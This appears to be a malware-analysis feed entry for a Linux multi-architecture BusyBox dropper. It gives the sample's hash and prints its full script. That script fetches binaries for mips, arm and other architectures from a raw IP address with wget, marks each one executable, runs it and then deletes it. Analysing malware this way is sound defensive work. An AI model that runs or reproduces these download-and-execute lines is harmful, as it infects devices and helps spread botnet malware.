Hostile 100% linux Download

t

Downloads and executes remote malware

Raw-IP BusyBox multi-architecture dropperRaw-IP multi-protocol dropper also deletes staged paths
SHA-25638a543b8702e97a2cc07cc1ca32c4a31ba6eacc0127f8774d35894689ce5f5e5

Evidence

BusyBox wget applet invocation lines 1–7
1cd /var;
2
3(wget http://205.237.110.232/gigatex/mips -O- || busybox wget http://205.237.110.232/gigatex/mips -O-) > .b; chmod 777 .b; ./.b randy; rm -rf .b;
4(wget http://205.237.110.232/gigatex/mpsl -O- || busybox wget http://205.237.110.232/gigatex/mpsl -O-) > .b; chmod 777 .b; ./.b randy; rm -rf .b;
5(wget http://205.237.110.232/gigatex/arm -O- || busybox wget http://205.237.110.232/gigatex/arm -O-) > .b; chmod 777 .b; ./.b randy; rm -rf .b;
6(wget http://205.237.110.232/gigatex/arm5 -O- || busybox wget http://205.237.110.232/gigatex/arm5 -O-) > .b; chmod 777 .b; ./.b randy; rm -rf .b;
7(wget http://205.237.110.232/gigatex/arm7 -O- || busybox wget http://205.237.110.232/gigatex/arm7 -O-) > .b; chmod 777 .b; ./.b randy; rm -rf .b;

Keyboard shortcuts on this page: j for the next sample, k for the previous one, x to go back to the feed, d to download the original bytes, r to re-queue the sample for analysis.